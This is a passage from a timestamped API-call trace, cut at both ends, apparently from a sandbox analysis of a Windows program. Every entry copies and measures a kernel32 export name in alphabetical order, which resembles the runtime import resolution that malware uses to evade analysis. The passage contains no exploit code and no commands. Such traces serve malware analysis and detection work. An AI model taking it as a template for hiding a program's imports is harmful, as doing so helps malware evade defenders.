lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.331] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.332] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.332] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.332] lstrlenA (lpString="COPYFILEW") returned 9 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.332] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.332] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.332] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.332] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.332] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.332] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.332] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.332] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.332] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.332] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.332] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.332] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.332] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.332] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.333] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.333] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.333] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.333] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.333] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.333] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.333] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.333] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.333] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.333] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.333] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.333] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.333] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.333] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.333] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.333] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.333] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.333] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.333] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.334] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.334] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.334] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.334] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.334] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.334] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.334] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.334] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.334] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.334] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.334] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.334] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.334] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.334] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.334] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.334] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.334] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.334] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.334] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.334] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.335] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.335] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.335] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.335] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.335] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.335] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.335] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.335] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.335] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.335] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.335] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.335] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.335] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.335] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.335] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.335] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.335] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.335] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.335] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.336] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.336] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.336] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.336] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.336] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.336] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.336] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.336] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.336] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.336] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.336] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.336] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.336] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.336] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.336] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.336] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.336] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.336] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.336] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.337] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.337] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.337] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.337] lstrlenA (lpString="DELETEATOM") returned 10 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.337] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.337] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.337] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.337] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.337] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.337] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.337] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.337] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.337] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.337] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.337] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.337] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.337] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.337] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.337] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.337] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.338] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.338] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.338] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.338] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.338] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.338] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.338] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.338] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.338] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.338] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.338] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.338] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.338] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.338] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.338] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.338] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.338] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.338] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.339] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 